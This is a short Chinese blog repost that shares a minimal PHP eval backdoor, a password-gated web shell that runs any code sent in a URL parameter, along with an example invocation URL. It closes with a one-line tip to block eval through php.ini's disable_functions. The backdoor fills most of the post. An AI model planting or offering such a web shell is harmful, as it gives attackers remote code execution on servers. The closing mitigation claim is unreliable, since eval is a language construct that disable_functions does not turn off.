第一部分:
分享个php eval后门程序
要求必须支持eval函数
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
代码:
<?php
$passwd
=
"admin"
;
if
(
$_GET
[
'pwd'
]!=
$passwd
)
exit
;
if
(
$_GET
[
'action'
]==
"eval"
&&
$_GET
[
'a'
]){
eval
(
$_GET
[
'a'
]);}
?>
第二部分:
禁用eval()函数:
php.ini中找到
disable_functions 写成 disable_functions = phpinfo,eval 之类即可
转载于:https://blog.51cto.com/jhomephper/1616011